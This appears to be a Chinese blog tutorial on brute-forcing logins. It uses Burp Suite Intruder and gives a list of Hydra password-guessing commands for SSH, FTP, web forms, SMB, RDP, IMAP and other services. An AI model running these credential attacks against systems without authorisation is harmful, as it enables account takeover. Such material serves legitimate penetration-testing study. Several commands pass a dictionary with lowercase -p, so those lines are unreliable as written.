burpSuite与九头蛇暴力破解


登录界面\

BrupSuite自带暴力破解

使用 BrupSuite 进行抓包:
发现账户和密码是使用GET方式提交的,然后我们右键将抓到的包发送到 测试器Intruder 模块进行暴力破解:

  • 使用集束炸弹模式(第四种)进行测试

  • 点击 clear 将所有参数置为未选中,然后将 username 和 password 选中,设置完毕后点击 payloads 开始设置攻击载荷:

  • 开始攻击,通过查看返回包的Length可判断是否爆破成功

kali中的在线破解软件hydra

1、破解ssh:

  hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh 
  hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 

2、破解ftp:

  hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV 
  hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 

3、get方式提交,破解web登录:

  hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ 
  hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

4、post方式提交,破解web登录:

  hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" 
  hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or             password</title>" 
  (参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。) 

5、破解https:

  hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 

6、破解teamspeak:

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak 

7、破解cisco:

  hydra -P pass.txt 10.36.16.18 cisco 
  hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 

8、破解smb:

  hydra -l administrator -P pass.txt 10.36.16.18 smb 

9、破解pop3:

  hydra -l muts -P pass.txt my.pop3.mail pop3 

10、破解rdp:

  hydra ip rdp -l administrator -P pass.txt -V 

11、破解http-proxy:

  hydra -l admin -P pass.txt http-proxy://10.36.16.18 

12、破解imap:

  hydra -L user.txt -p secret 10.36.16.18 imap PLAIN 
  hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
posted @ 2020-06-30 00:00  小疯紫  阅读(361)  评论(0编辑  收藏  举报